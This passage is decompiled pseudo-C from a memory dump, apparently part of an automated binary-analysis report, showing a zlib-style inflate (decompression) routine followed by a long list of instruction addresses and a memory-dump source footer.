                                                            							__eax =  *(__ebp + 8) & 0x00000007;
                                                            							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
                                                            							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
                                                            							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
                                                            							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
                                                            							__ecx =  *(__esi + 4);
                                                            							 *(__esi + 8) =  *(__esi + 8) + 1;
                                                            							__eax =  *(__esi + 8);
                                                            							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
                                                            							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                                            						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
                                                            						goto L64;
                                                            						L50:
                                                            						__ecx =  *(__ebp + 0xc);
                                                            						while(1) {
                                                            							__eflags = __ecx - 0xe;
                                                            							if(__ecx >= 0xe) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *(__ebp - 4);
                                                            							if( *(__ebp - 4) == 0) {
                                                            								goto L107;
                                                            							}
                                                            							__eax =  *__ebx & 0x000000ff;
                                                            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            							 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                            							__eax = ( *__ebx & 0x000000ff) << __cl;
                                                            							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                            							__ebx = __ebx + 1;
                                                            							__ecx = __ecx + 8;
                                                            							 *(__ebp + 0xc) = __ecx;
                                                            						}
                                                            						__eax =  *(__ebp + 8);
                                                            						__eax =  *(__ebp + 8) & 0x00003fff;
                                                            						__ecx = __eax;
                                                            						 *(__esi + 4) = __eax;
                                                            						__ecx = __eax & 0x0000001f;
                                                            						__eflags = __ecx - 0x1d;
                                                            						if(__ecx > 0x1d) {
                                                            							L109:
                                                            							 *__esi = 9;
                                                            							__edi[6] = "too many length or distance symbols";
                                                            							break;
                                                            						}
                                                            						__eax = __eax & 0x000003e0;
                                                            						__eflags = (__eax & 0x000003e0) - 0x3a0;
                                                            						if((__eax & 0x000003e0) > 0x3a0) {
                                                            							goto L109;
                                                            						}
                                                            						__eax = __eax >> 5;
                                                            						__eax = __eax & 0x0000001f;
                                                            						__eax = __edi[8](__edi[0xa], __eax, 4);
                                                            						__esp = __esp + 0xc;
                                                            						 *(__esi + 0xc) = __eax;
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							goto L116;
                                                            						}
                                                            						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
                                                            						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
                                                            						_t138 = __esi + 8;
                                                            						 *_t138 =  *(__esi + 8) & 0x00000000;
                                                            						__eflags =  *_t138;
                                                            						 *__esi = 4;
                                                            						goto L58;
                                                            						L27:
                                                            						__eflags =  *(__ebp - 4);
                                                            						if( *(__ebp - 4) == 0) {
                                                            							goto L107;
                                                            						}
                                                            						__eflags = __ecx;
                                                            						if(__ecx != 0) {
                                                            							L44:
                                                            							__eax =  *(__esi + 4);
                                                            							__ecx =  *(__ebp - 4);
                                                            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            							__eflags = __eax - __ecx;
                                                            							 *(__ebp - 0xc) = __eax;
                                                            							if(__eax > __ecx) {
                                                            								 *(__ebp - 0xc) = __ecx;
                                                            							}
                                                            							__eax =  *(__ebp - 0x10);
                                                            							__eflags =  *(__ebp - 0xc) - __eax;
                                                            							if( *(__ebp - 0xc) > __eax) {
                                                            								 *(__ebp - 0xc) = __eax;
                                                            							}
                                                            							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
                                                            							__eax =  *(__ebp - 0xc);
                                                            							__esp = __esp + 0xc;
                                                            							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                            							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
                                                            							__ebx = __ebx + __eax;
                                                            							_t115 = __esi + 4;
                                                            							 *_t115 =  *(__esi + 4) - __eax;
                                                            							__eflags =  *_t115;
                                                            							if( *_t115 == 0) {
                                                            								L49:
                                                            								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
                                                            								asm("sbb eax, eax");
                                                            								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
                                                            								L16:
                                                            								 *_t488 = _t456;
                                                            							}
                                                            							goto L98;
                                                            						}
                                                            						__ecx =  *(__esi + 0x2c);
                                                            						__eflags = __edx - __ecx;
                                                            						if(__edx != __ecx) {
                                                            							L35:
                                                            							__eax =  *(__ebp - 8);
                                                            							 *(__esi + 0x34) =  *(__ebp - 8);
                                                            							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
                                                            							__ecx =  *(__esi + 0x30);
                                                            							 *(__ebp + 0x10) = __eax;
                                                            							__eax =  *(__esi + 0x34);
                                                            							__eflags = __eax - __ecx;
                                                            							 *(__ebp - 8) = __eax;
                                                            							if(__eax >= __ecx) {
                                                            								__edx =  *(__esi + 0x2c);
                                                            								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
                                                            								__eflags = __edx;
                                                            								 *(__ebp - 0x10) = __edx;
                                                            							} else {
                                                            								__ecx = __ecx -  *(__ebp - 8);
                                                            								__eax = __ecx -  *(__ebp - 8) - 1;
                                                            								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
                                                            							}
                                                            							__edx =  *(__esi + 0x2c);
                                                            							__eflags =  *(__ebp - 8) - __edx;
                                                            							if( *(__ebp - 8) == __edx) {
                                                            								__eax =  *(__esi + 0x28);
                                                            								__eflags = __eax - __ecx;
                                                            								if(__eflags != 0) {
                                                            									 *(__ebp - 8) = __eax;
                                                            									if(__eflags >= 0) {
                                                            										__edx = __edx - __eax;
                                                            										__eflags = __edx;
                                                            										 *(__ebp - 0x10) = __edx;
                                                            									} else {
                                                            										__ecx = __ecx - __eax;
                                                            										__ecx = __ecx - 1;
                                                            										 *(__ebp - 0x10) = __ecx;
                                                            									}
                                                            								}
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10);
                                                            							if( *(__ebp - 0x10) == 0) {
                                                            								__eax =  *(__ebp + 8);
                                                            								 *(__esi + 0x20) =  *(__ebp + 8);
                                                            								__eax =  *(__ebp + 0xc);
                                                            								 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            								__eax =  *(__ebp - 4);
                                                            								__edi[1] =  *(__ebp - 4);
                                                            								goto L108;
                                                            							} else {
                                                            								goto L44;
                                                            							}
                                                            						}
                                                            						__eax =  *(__esi + 0x30);
                                                            						__edx =  *(__esi + 0x28);
                                                            						__eflags = __edx - __eax;
                                                            						if(__eflags == 0) {
                                                            							goto L35;
                                                            						}
                                                            						 *(__ebp - 8) = __edx;
                                                            						if(__eflags >= 0) {
                                                            							__ecx = __ecx - __edx;
                                                            							__eflags = __ecx;
                                                            							 *(__ebp - 0x10) = __ecx;
                                                            						} else {
                                                            							__eax = __eax - __edx;
                                                            							 *(__ebp - 0x10) = __eax;
                                                            						}
                                                            						__eflags =  *(__ebp - 0x10);
                                                            						if( *(__ebp - 0x10) != 0) {
                                                            							goto L44;
                                                            						} else {
                                                            							goto L35;
                                                            						}
                                                            						L20:
                                                            						__ecx =  *(__ebp + 0xc);
                                                            						while(1) {
                                                            							__eflags = __ecx - 0x20;
                                                            							if(__ecx >= 0x20) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *(__ebp - 4);
                                                            							if( *(__ebp - 4) == 0) {
                                                            								goto L107;
                                                            							}
                                                            							__eax =  *__ebx & 0x000000ff;
                                                            							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            							 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                            							__eax = ( *__ebx & 0x000000ff) << __cl;
                                                            							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                            							__ebx = __ebx + 1;
                                                            							__ecx = __ecx + 8;
                                                            							 *(__ebp + 0xc) = __ecx;
                                                            						}
                                                            						__ecx =  *(__ebp + 8);
                                                            						__eax =  *(__ebp + 8);
                                                            						__ecx =  !( *(__ebp + 8));
                                                            						__eax =  *(__ebp + 8) & 0x0000ffff;
                                                            						__ecx =  !( *(__ebp + 8)) >> 0x10;
                                                            						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
                                                            						__eflags = __ecx;
                                                            						if(__ecx != 0) {
                                                            							 *__esi = 9;
                                                            							__edi[6] = "invalid stored block lengths";
                                                            							break;
                                                            						}
                                                            						 *(__esi + 4) = __eax;
                                                            						__eax = 0;
                                                            						__eflags =  *(__esi + 4);
                                                            						 *(__ebp + 0xc) = 0;
                                                            						 *(__ebp + 8) = 0;
                                                            						if( *(__esi + 4) == 0) {
                                                            							goto L49;
                                                            						}
                                                            						__eax = 2;
                                                            						goto L16;
                                                            						L7:
                                                            						while( *(_t490 + 0xc) < 3) {
                                                            							if( *(_t490 - 4) == 0) {
                                                            								goto L107;
                                                            							}
                                                            							_t479 =  *(_t490 + 0xc);
                                                            							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
                                                            							 *(_t490 - 4) =  *(_t490 - 4) - 1;
                                                            							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
                                                            							_t476 =  &(_t476[1]);
                                                            							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
                                                            						}
                                                            						_t436 =  *(_t490 + 8) & 0x00000007;
                                                            						_t479 = _t436 & 0x00000001;
                                                            						_t438 = _t436 >> 1;
                                                            						__eflags = _t438;
                                                            						_t488[6] = _t436 & 0x00000001;
                                                            						if(_t438 == 0) {
                                                            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
                                                            							 *_t488 = 1;
                                                            							_t479 =  *(_t490 + 0xc) & 0x00000007;
                                                            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
                                                            							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
                                                            							goto L98;
                                                            						}
                                                            						_t442 = _t438 - 1;
                                                            						__eflags = _t442;
                                                            						if(_t442 == 0) {
                                                            							_push(_t485);
                                                            							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
                                                            							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
                                                            							_t493 = _t493 + 0x28;
                                                            							_t488[1] = _t448;
                                                            							__eflags = _t448;
                                                            							if(_t448 == 0) {
                                                            								goto L116;
                                                            							}
                                                            							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
                                                            							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
                                                            							 *_t488 = 6;
                                                            							goto L98;
                                                            						}
                                                            						_t455 = _t442 - 1;
                                                            						__eflags = _t455;
                                                            						if(_t455 == 0) {
                                                            							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
                                                            							_t456 = 3;
                                                            							_t33 = _t490 + 0xc;
                                                            							 *_t33 =  *(_t490 + 0xc) - _t456;
                                                            							__eflags =  *_t33;
                                                            							goto L16;
                                                            						}
                                                            						__eflags = _t455 == 1;
                                                            						if(_t455 == 1) {
                                                            							 *_t488 = 9;
                                                            							 *(_t485 + 0x18) = "invalid block type";
                                                            							_t488[8] =  *(_t490 + 8) >> 3;
                                                            							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
                                                            							L105:
                                                            							_t488[7] = _t461;
                                                            							 *(_t485 + 4) =  *(_t490 - 4);
                                                            							 *_t485 = _t476;
                                                            							_push(0xfffffffd);
                                                            							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                            							_t488[0xd] =  *(_t490 - 8);
                                                            							goto L100;
                                                            						}
                                                            						goto L98;
                                                            					}
                                                            					L104:
                                                            					__eax =  *(__ebp + 8);
                                                            					 *(__esi + 0x20) =  *(__ebp + 8);
                                                            					__eax =  *(__ebp + 0xc);
                                                            					goto L105;
                                                            					L122:
                                                            					__eax =  *(__ebp + 8);
                                                            					_push(1);
                                                            					 *(__esi + 0x20) =  *(__ebp + 8);
                                                            					__eax =  *(__ebp + 0xc);
                                                            					 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            					__eax =  *(__ebp - 4);
                                                            					__edi[1] =  *(__ebp - 4);
                                                            					__ebx = __ebx -  *__edi;
                                                            					 *__edi = __ebx;
                                                            					__edi[2] = __edi[2] + __ebx -  *__edi;
                                                            					__eax =  *(__ebp - 8);
                                                            					 *(__esi + 0x34) =  *(__ebp - 8);
                                                            					goto L100;
                                                            					L118:
                                                            					__eax =  *(__ebp - 8);
                                                            					 *(__esi + 0x34) =  *(__ebp - 8);
                                                            					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
                                                            					__ecx =  *(__esi + 0x34);
                                                            					__eflags =  *(__esi + 0x30) - __ecx;
                                                            					 *(__ebp - 8) = __ecx;
                                                            					if( *(__esi + 0x30) == __ecx) {
                                                            						 *__esi = 8;
                                                            						goto L122;
                                                            					}
                                                            					__ecx =  *(__ebp + 8);
                                                            					 *(__esi + 0x20) =  *(__ebp + 8);
                                                            					__ecx =  *(__ebp + 0xc);
                                                            					 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            					__ecx =  *(__ebp - 4);
                                                            					__edi[1] =  *(__ebp - 4);
                                                            					__ebx = __ebx -  *__edi;
                                                            					 *__edi = __ebx;
                                                            					_t409 =  &(__edi[2]);
                                                            					 *_t409 = __edi[2] + __ebx -  *__edi;
                                                            					__eflags =  *_t409;
                                                            					__ecx =  *(__ebp - 8);
                                                            					 *(__esi + 0x34) = __ecx;
                                                            					goto L120;
                                                            				}
                                                            			}























                                                            0x004043b7
                                                            0x004043b9
                                                            0x004043be
                                                            0x004043c2
                                                            0x004043c5
                                                            0x004043cb
                                                            0x004043cd
                                                            0x004043d3
                                                            0x004043d9
                                                            0x004043dc
                                                            0x004043e1
                                                            0x004043e4
                                                            0x004043f0
                                                            0x004043f0
                                                            0x004043e6
                                                            0x004043e9
                                                            0x004043e9
                                                            0x004043f2
                                                            0x004043f4
                                                            0x004043fa
                                                            0x004049c2
                                                            0x004049c5
                                                            0x004049c7
                                                            0x004049cd
                                                            0x004049d3
                                                            0x004049da
                                                            0x004049dc
                                                            0x004049dc
                                                            0x004049dc
                                                            0x004049e2
                                                            0x00000000
                                                            0x00404400
                                                            0x00404408
                                                            0x00404408
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404935
                                                            0x00404935
                                                            0x0040493b
                                                            0x0040493e
                                                            0x00404941
                                                            0x00404944
                                                            0x00404947
                                                            0x0040494c
                                                            0x0040494f
                                                            0x00404952
                                                            0x00404955
                                                            0x00404958
                                                            0x0040495b
                                                            0x00404963
                                                            0x00404966
                                                            0x00404b89
                                                            0x00404b89
                                                            0x004049e5
                                                            0x004049e5
                                                            0x004049e6
                                                            0x004049e7
                                                            0x004049ef
                                                            0x004049f3
                                                            0x004049f3
                                                            0x0040496c
                                                            0x00404979
                                                            0x0040497c
                                                            0x0040497e
                                                            0x00404981
                                                            0x00404984
                                                            0x00404985
                                                            0x00404988
                                                            0x0040498b
                                                            0x0040498c
                                                            0x0040498f
                                                            0x00404992
                                                            0x00404995
                                                            0x00404998
                                                            0x0040499a
                                                            0x004049a1
                                                            0x004049a4
                                                            0x004049a4
                                                            0x0040499c
                                                            0x0040499c
                                                            0x0040499e
                                                            0x0040499e
                                                            0x004049a7
                                                            0x004049ab
                                                            0x004049ae
                                                            0x00404b44
                                                            0x00000000
                                                            0x004049b4
                                                            0x004049b4
                                                            0x004049b4
                                                            0x004049b7
                                                            0x004049b7
                                                            0x004049b9
                                                            0x004049bc
                                                            0x00404402
                                                            0x00000000
                                                            0x00404405
                                                            0x00000000
                                                            0x004049bc
                                                            0x0040476e
                                                            0x0040476e
                                                            0x0040476e
                                                            0x00404771
                                                            0x00404774
                                                            0x00404776
                                                            0x00404779
                                                            0x0040477c
                                                            0x0040477f
                                                            0x0040477f
                                                            0x00404786
                                                            0x00404788
                                                            0x00000000
                                                            0x00000000
                                                            0x0040478e
                                                            0x00404791
                                                            0x00404791
                                                            0x00404794
                                                            0x00000000
                                                            0x00000000
                                                            0x00404796
                                                            0x0040479a
                                                            0x00404a58
                                                            0x00404a5b
                                                            0x00404a61
                                                            0x00404a64
                                                            0x00404a64
                                                            0x00404a64
                                                            0x00404a68
                                                            0x00404a6a
                                                            0x00404a6f
                                                            0x00404a71
                                                            0x00404a77
                                                            0x00000000
                                                            0x00404a77
                                                            0x004047a0
                                                            0x004047a3
                                                            0x004047a6
                                                            0x004047aa
                                                            0x004047ad
                                                            0x004047af
                                                            0x004047b2
                                                            0x004047b3
                                                            0x004047b3
                                                            0x004047b9
                                                            0x004047c0
                                                            0x004047c3
                                                            0x004047c6
                                                            0x004047ca
                                                            0x004047cd
                                                            0x004047d0
                                                            0x004047d3
                                                            0x004047d7
                                                            0x004047da
                                                            0x004047f5
                                                            0x004047f8
                                                            0x004047ff
                                                            0x004047ff
                                                            0x004047fa
                                                            0x004047fc
                                                            0x004047fc
                                                            0x00404802
                                                            0x00404804
                                                            0x0040480a
                                                            0x0040480b
                                                            0x0040480e
                                                            0x0040480e
                                                            0x00404811
                                                            0x00404814
                                                            0x00404814
                                                            0x00404817
                                                            0x0040481a
                                                            0x0040481d
                                                            0x00000000
                                                            0x00000000
                                                            0x0040481f
                                                            0x00404823
                                                            0x00000000
                                                            0x00000000
                                                            0x00404829
                                                            0x0040482c
                                                            0x0040482f
                                                            0x00404833
                                                            0x00404836
                                                            0x00404838
                                                            0x0040483b
                                                            0x0040483c
                                                            0x0040483c
                                                            0x00404842
                                                            0x0040484c
                                                            0x0040484f
                                                            0x00404852
                                                            0x00404854
                                                            0x00404857
                                                            0x0040485a
                                                            0x0040485c
                                                            0x0040485f
                                                            0x00404862
                                                            0x00404865
                                                            0x00404867
                                                            0x0040486a
                                                            0x0040486d
                                                            0x00404870
                                                            0x00404870
                                                            0x0040487a
                                                            0x0040487c
                                                            0x0040487e
                                                            0x00404a94
                                                            0x00404a9d
                                                            0x00404aa0
                                                            0x00404aa6
                                                            0x00404aad
                                                            0x00404ab0
                                                            0x00404ab5
                                                            0x00404ab8
                                                            0x00404abb
                                                            0x00404ac0
                                                            0x00404ac3
                                                            0x00404ac6
                                                            0x00404ac9
                                                            0x00404acc
                                                            0x00404acf
                                                            0x00000000
                                                            0x00404ad4
                                                            0x00404884
                                                            0x00404888
                                                            0x0040489c
                                                            0x0040489c
                                                            0x0040489e
                                                            0x0040489e
                                                            0x0040489e
                                                            0x004048a1
                                                            0x004048a4
                                                            0x004048a5
                                                            0x004048a5
                                                            0x004048a5
                                                            0x004048a5
                                                            0x004048aa
                                                            0x00000000
                                                            0x004048aa
                                                            0x0040488a
                                                            0x0040488d
                                                            0x00000000
                                                            0x00000000
                                                            0x00404893
                                                            0x00404896
                                                            0x00000000
                                                            0x00404896
                                                            0x004047dc
                                                            0x004047df
                                                            0x004047e1
                                                            0x004047e4
                                                            0x004047e7
                                                            0x004047ea
                                                            0x004047ed
                                                            0x004047ed
                                                            0x004048b3
                                                            0x004048b9
                                                            0x004048bc
                                                            0x004048c0
                                                            0x004048cc
                                                            0x004048d0
                                                            0x004048d4
                                                            0x004048d9
                                                            0x004048dc
                                                            0x004048df
                                                            0x004048e2
                                                            0x004048e7
                                                            0x004048e8
                                                            0x004048f1
                                                            0x004048f9
                                                            0x004048fc
                                                            0x004048fe
                                                            0x00404adc
                                                            0x00404ae0
                                                            0x00404ae0
                                                            0x00404ae8
                                                            0x00404aeb
                                                            0x00404aec
                                                            0x00404af2
                                                            0x00404af2
                                                            0x00404af3
                                                            0x00404af6
                                                            0x00404af9
                                                            0x00404afc
                                                            0x00404aff
                                                            0x00404b02
                                                            0x00404b05
                                                            0x00404b0a
                                                            0x00404b0c
                                                            0x00404b0e
                                                            0x00404b11
                                                            0x00404b14
                                                            0x00000000
                                                            0x00404b14
                                                            0x00404911
                                                            0x00404919
                                                            0x0040491b
                                                            0x00404b1c
                                                            0x00404b1f
                                                            0x00404b21
                                                            0x00404b27
                                                            0x00404b2d
                                                            0x00404b34
                                                            0x00404b36
                                                            0x00404b3c
                                                            0x00000000
                                                            0x00404b3c
                                                            0x00404924
                                                            0x0040492a
                                                            0x0040492d
                                                            0x0040492e
                                                            0x00404934
                                                            0x00000000
                                                            0x004046b8
                                                            0x004046bb
                                                            0x004046be
                                                            0x004046c1
                                                            0x004046c4
                                                            0x00404721
                                                            0x00404721
                                                            0x00404721
                                                            0x00404725
                                                            0x00000000
                                                            0x00000000
                                                            0x00404727
                                                            0x0040472a
                                                            0x00404734
                                                            0x00404738
                                                            0x00404738
                                                            0x0040473e
                                                            0x00404744
                                                            0x0040474c
                                                            0x00404752
                                                            0x0040475a
                                                            0x0040475d
                                                            0x0040475f
                                                            0x00404a8e
                                                            0x00000000
                                                            0x00404a8e
                                                            0x00404765
                                                            0x00404765
                                                            0x00404765
                                                            0x00404768
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004046c6
                                                            0x004046c6
                                                            0x004046c6
                                                            0x004046c9
                                                            0x004046c9
                                                            0x004046cc
                                                            0x00000000
                                                            0x00000000
                                                            0x004046ce
                                                            0x004046d2
                                                            0x00000000
                                                            0x00000000
                                                            0x004046d8
                                                            0x004046db
                                                            0x004046df
                                                            0x004046e2
                                                            0x004046e4
                                                            0x004046e7
                                                            0x004046e8
                                                            0x004046eb
                                                            0x004046eb
                                                            0x004046f0
                                                            0x004046f0
                                                            0x004046f3
                                                            0x004046f6
                                                            0x004046f9
                                                            0x004046fc
                                                            0x00404703
                                                            0x00404707
                                                            0x0040470b
                                                            0x0040470e
                                                            0x00404711
                                                            0x00404714
                                                            0x0040471a
                                                            0x0040471d
                                                            0x0040471d
                                                            0x00000000
                                                            0x0040462b
                                                            0x0040462b
                                                            0x0040462e
                                                            0x0040462e
                                                            0x00404631
                                                            0x00000000
                                                            0x00000000
                                                            0x00404633
                                                            0x00404637
                                                            0x00000000
                                                            0x00000000
                                                            0x0040463d
                                                            0x00404640
                                                            0x00404644
                                                            0x00404647
                                                            0x00404649
                                                            0x0040464c
                                                            0x0040464d
                                                            0x00404650
                                                            0x00404650
                                                            0x00404655
                                                            0x00404658
                                                            0x0040465d
                                                            0x0040465f
                                                            0x00404662
                                                            0x00404665
                                                            0x00404668
                                                            0x00404a7f
                                                            0x00404a7f
                                                            0x00404a85
                                                            0x00000000
                                                            0x00404a85
                                                            0x00404670
                                                            0x00404676
                                                            0x0040467c
                                                            0x00000000
                                                            0x00000000
                                                            0x00404682
                                                            0x00404685
                                                            0x00404695
                                                            0x00404698
                                                            0x0040469b
                                                            0x0040469e
                                                            0x004046a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004046a6
                                                            0x004046aa
                                                            0x004046ae
                                                            0x004046ae
                                                            0x004046ae
                                                            0x004046b2
                                                            0x00000000
                                                            0x0040453a
                                                            0x0040453a
                                                            0x0040453e
                                                            0x00000000
                                                            0x00000000
                                                            0x00404544
                                                            0x00404546
                                                            0x004045d7
                                                            0x004045d7
                                                            0x004045da
                                                            0x004045dd
                                                            0x004045e1
                                                            0x004045e3
                                                            0x004045e6
                                                            0x004045e8
                                                            0x004045e8
                                                            0x004045eb
                                                            0x004045ee
                                                            0x004045f1
                                                            0x004045f3
                                                            0x004045f3
                                                            0x004045fd
                                                            0x00404602
                                                            0x00404605
                                                            0x00404608
                                                            0x0040460b
                                                            0x0040460e
                                                            0x00404611
                                                            0x00404613
                                                            0x00404613
                                                            0x00404613
                                                            0x00404616
                                                            0x0040461c
                                                            0x0040461f
                                                            0x00404621
                                                            0x00404623
                                                            0x00404469
                                                            0x00404469
                                                            0x00404469
                                                            0x00000000
                                                            0x00404616
                                                            0x0040454c
                                                            0x0040454f
                                                            0x00404551
                                                            0x00404575
                                                            0x00404578
                                                            0x0040457b
                                                            0x00404580
                                                            0x00404585
                                                            0x00404588
                                                            0x0040458b
                                                            0x00404591
                                                            0x00404593
                                                            0x00404596
                                                            0x004045a3
                                                            0x004045a6
                                                            0x004045a6
                                                            0x004045a9
                                                            0x00404598
                                                            0x0040459a
                                                            0x0040459d
                                                            0x0040459e
                                                            0x0040459e
                                                            0x004045ac
                                                            0x004045af
                                                            0x004045b2
                                                            0x004045b4
                                                            0x004045b7
                                                            0x004045b9
                                                            0x004045bb
                                                            0x004045be
                                                            0x004045c8
                                                            0x004045c8
                                                            0x004045ca
                                                            0x004045c0
                                                            0x004045c0
                                                            0x004045c2
                                                            0x004045c3
                                                            0x004045c3
                                                            0x004045be
                                                            0x004045b9
                                                            0x004045cd
                                                            0x004045d1
                                                            0x00404a44
                                                            0x00404a47
                                                            0x00404a4a
                                                            0x00404a4d
                                                            0x00404a50
                                                            0x00404a53
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004045d1
                                                            0x00404553
                                                            0x00404556
                                                            0x00404559
                                                            0x0040455b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040455d
                                                            0x00404560
                                                            0x0040456a
                                                            0x0040456a
                                                            0x0040456c
                                                            0x00404562
                                                            0x00404562
                                                            0x00404565
                                                            0x00404565
                                                            0x0040456f
                                                            0x00404573
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004044dc
                                                            0x004044dc
                                                            0x004044df
                                                            0x004044df
                                                            0x004044e2
                                                            0x00000000
                                                            0x00000000
                                                            0x004044e4
                                                            0x004044e8
                                                            0x00000000
                                                            0x00000000
                                                            0x004044ee
                                                            0x004044f1
                                                            0x004044f5
                                                            0x004044f8
                                                            0x004044fa
                                                            0x004044fd
                                                            0x004044fe
                                                            0x00404501
                                                            0x00404501
                                                            0x00404506
                                                            0x00404509
                                                            0x0040450c
                                                            0x0040450e
                                                            0x00404513
                                                            0x00404516
                                                            0x00404516
                                                            0x00404518
                                                            0x00404a12
                                                            0x00404a18
                                                            0x00000000
                                                            0x00404a18
                                                            0x0040451e
                                                            0x00404521
                                                            0x00404523
                                                            0x00404526
                                                            0x00404529
                                                            0x0040452c
                                                            0x00000000
                                                            0x00000000
                                                            0x00404534
                                                            0x00000000
                                                            0x00000000
                                                            0x0040440f
                                                            0x00404419
                                                            0x00000000
                                                            0x00000000
                                                            0x00404422
                                                            0x00404425
                                                            0x00404429
                                                            0x0040442e
                                                            0x00404431
                                                            0x00404432
                                                            0x00404432
                                                            0x0040443b
                                                            0x00404442
                                                            0x00404445
                                                            0x00404445
                                                            0x00404448
                                                            0x0040444b
                                                            0x004044b9
                                                            0x004044c3
                                                            0x004044c9
                                                            0x004044d1
                                                            0x004044d4
                                                            0x00000000
                                                            0x004044d4
                                                            0x0040444d
                                                            0x0040444d
                                                            0x0040444e
                                                            0x00404473
                                                            0x00404481
                                                            0x00404493
                                                            0x00404498
                                                            0x0040449b
                                                            0x0040449e
                                                            0x004044a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004044a6
                                                            0x004044aa
                                                            0x004044ae
                                                            0x00000000
                                                            0x004044ae
                                                            0x00404450
                                                            0x00404450
                                                            0x00404451
                                                            0x0040445f
                                                            0x00404465
                                                            0x00404466
                                                            0x00404466
                                                            0x00404466
                                                            0x00000000
                                                            0x00404466
                                                            0x00404453
                                                            0x00404454
                                                            0x004049f7
                                                            0x00404a00
                                                            0x00404a07
                                                            0x00404a0d
                                                            0x00404a28
                                                            0x00404a28
                                                            0x00404a2e
                                                            0x00404a35
                                                            0x00404a37
                                                            0x00404a39
                                                            0x00404a3f
                                                            0x00000000
                                                            0x00404a3f
                                                            0x00000000
                                                            0x0040445a
                                                            0x00404a1f
                                                            0x00404a1f
                                                            0x00404a22
                                                            0x00404a25
                                                            0x00000000
                                                            0x00404b95
                                                            0x00404b95
                                                            0x00404b98
                                                            0x00404b9a
                                                            0x00404b9d
                                                            0x00404ba0
                                                            0x00404ba3
                                                            0x00404ba6
                                                            0x00404bab
                                                            0x00404bad
                                                            0x00404baf
                                                            0x00404bb2
                                                            0x00404bb5
                                                            0x00000000
                                                            0x00404b4a
                                                            0x00404b4d
                                                            0x00404b50
                                                            0x00404b55
                                                            0x00404b5a
                                                            0x00404b60
                                                            0x00404b63
                                                            0x00404b66
                                                            0x00404b8f
                                                            0x00000000
                                                            0x00404b8f
                                                            0x00404b68
                                                            0x00404b6b
                                                            0x00404b6e
                                                            0x00404b71
                                                            0x00404b74
                                                            0x00404b77
                                                            0x00404b7c
                                                            0x00404b7e
                                                            0x00404b80
                                                            0x00404b80
                                                            0x00404b80
                                                            0x00404b83
                                                            0x00404b86
                                                            0x00000000
                                                            0x00404b86

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
